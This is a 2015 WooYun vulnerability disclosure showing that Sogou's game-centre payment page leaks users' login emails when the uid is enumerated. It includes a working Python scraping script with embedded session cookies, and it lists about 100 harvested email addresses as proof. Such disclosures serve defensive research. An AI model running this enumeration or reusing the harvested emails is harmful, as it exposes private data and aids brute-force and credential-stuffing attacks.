当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130387

漏洞标题:搜狗6000万用户登录邮箱可通过uid遍历

相关厂商:搜狗

漏洞作者: Vinc

提交时间:2015-07-30 10:37

修复时间:2015-09-13 11:00

公开时间:2015-09-13 11:00

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-07-30: 厂商已经确认,细节仅向厂商公开
2015-08-09: 细节向核心白帽子及相关领域专家公开
2015-08-19: 细节向普通白帽子公开
2015-08-29: 细节向实习白帽子公开
2015-09-13: 细节向公众公开

简要描述:

看到这个http://wooyun.org/bugs/wooyun-2014-077356 想到的

详细说明:

1.sogou游戏中心站点http://wan.sogou.com/p/index.do
2.充值处,可以为他人充值
该处可以通过遍历uid来获取其他用户的邮箱信息,用作暴力破解或者撞裤
通过测试uid,有6000万+用户
POST请求包如下:

123.png


附上Py脚本:

if __name__ == '__main__':
	for i in range (1000):
		params=urllib.urlencode({'gid':'233','sid':'21','paygate':'-331','amount':'10','uid':i})
		headers={
		             "Cookie":"IPLOC=CN2100; SUID=63043D777D23900A000000005552F7EA; SUV=00D766AC773D04635552F7EB7AADD090; usid=63043D7730890E0A000000005563D38A; CNZZDATA1255303155=1173610824-1438220021-%7C1438220021; swfLayer=1; ppinf=5|1438220959|1439430559|Y2xpZW50aWQ6NDoxMTAwfGNydDoxMDoxNDM4MjIwOTU5fHJlZm5pY2s6MDp8dHJ1c3Q6MToxfHVzZXJpZDoxOTpkb250c2F5aGVoZUAxNjMuY29tfHVuaXFuYW1lOjk6MTEyMzQyMzExfA; pprdig=pgpiRH6X-cilVdO8pLT6V2s5gcos7yfRdrabmaNieW1v0MJawaw-M3qUMkNr_hovhIZZ0ZeQsD7yPnehRoZrb5BJA8bY5BDKs1awJwVDqhlPsLplQrsWSXB3hrUYGXTdKKhCgV-a3Pwi6qeSlGF6iJ4lD_qeDE8PifX6cA1GZDA; email=**********; SSUID=BEF747DFDC68FA329D3F93994957BE5A; ppmdig=1438220960000000dd5308bce1c345c0d36e8be0ae55856e; hostid=40731406; JSESSIONID=aaaiTZSNM3yNBghhKPC7u",
		             "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8","Connection":"keep-alive",
		             "Pragma":"no-cache","Cache-Control":"no-cache","Accept":"*/*","Accept-Language":"zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"
		        }
		conn = httplib.HTTPConnection('wan.sogou.com','80',True,2)
		conn.request(method="POST",url="/payconfirm.do",body=params,headers=headers)
		response = conn.getresponse()
		body = response.read()
		usermail = re.findall(r'(?<= id="dUid" class="font-black">).*?(?=</dd>)',body)
		print usermail[0]

漏洞证明:

频率不要太快,跑了100个测试下。
zhaozhe112@sohu.com
zhaozhe112234@sogou.com
bellwill@sogou.com
gaodingsogou@sogou.com
burst@sogou.com
bellscape@sogou.com
testxiuew@sogou.com
zhaozhe1123x@sogou.com
hotfall@sohu.com
xn-test1@sogou.com
loveystar@chinaren.com
liuxu-sogou@sogou.com
rainbow8416@sogou.com
liuxv87@sogou.com
caodanaxx1@sogou.com
wx2011916105724@sogou.com
burst009x@sogou.com
burst00786@sogou.com
gg123xo@sogou.com
txieiwowe@sogou.com
sonicfeng1981@sohu.com
burstx980@sogou.com
xn-test2@sogou.com
xianghuiru108@sohu.com
hotfall@sogou.com
caodanx@sogou.com
zhongshenxx@sogou.com
a123xy@sogou.com
axx98xl@sogou.com
axx1238-@sogou.com
xfew9874@sogou.com
stdio1@sohu.com
xn-test3@sogou.com
xn-test4@sogou.com
burst123x@sogou.com
xianghuiru5678@sogou.com
bellzhong123@sogou.com
lx187654@sogou.com
zhaozhezheng@sogou.com
xn-test5@sogou.com
sogou_open@sogou.com
a1520008935@sogou.com
xn-test6@sogou.com
xn-test7@sogou.com
a649577224@sogou.com
rty5664@sogou.com
lilin199211@sogou.com
xuexiaozhou123@sogou.com
et1130179276@sogou.com
hjhghgnb@sogou.com
wsnm1336149162@sogou.com
zjj825827@sohu.com
ww392220261@sogou.com
ljc34522748@sogou.com
w1611310734@sogou.com
sw1579483698@sogou.com
t6r65556653@sogou.com
ggf1228801615@sogou.com
w19920622@sogou.com
qiuchaojn@sogou.com
ij919440687@sogou.com
lxtext@sogou.com
a1107937270@sogou.com
dhfudshgufdg@sogou.com
qwertyuiop147236@sogou.com
qw06123456@sogou.com
yh5445456@sogou.com
jixueli@sogou.com
wss188@sogou.com
h1256508348@sogou.com
jasq@sogou.com
s994256021@sogou.com
zxc1693231929@sogou.com
u1403233627@sogou.com
qweas1073909212@sogou.com
a1491255961@sogou.com
dongdan114@sogou.com
liminhe@sogou.com
xt1230.123@sogou.com
yhhggy@sogou.com
laotian_2000_2000@chinaren.com
hgfhvghggvf@sogou.com
kuanglianpu1@sogou.com
as625673784@sogou.com
q17992140714@sogou.com
gk1094918561@sogou.com
xiaozhuge2@sogou.com
jim.@sogou.com
wangyan_works@sogou.com
q616066451@sogou.com
ffgklpglper@sogou.com
香百合1@focus.cn
a422193476@sogou.com
hgfjdsawu@sogou.com
jvb132@sogou.com
f1591268761@sogou.com
qrwerwt3465hrt@sogou.com
a1346927986482@sogou.com
gulang.com@sogou.com
zxvgbgf@sogou.com
zhi787747702@sogou.com
a1554567397@sogou.com
wm798200@focus.cn
abc-.@sogou.com
zhou1786962732@sogou.com

修复方案:

版权声明:转载请注明来源 Vinc@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-30 10:58

厂商回复:

感谢支持!

最新状态:

暂无

漏洞评价:

评论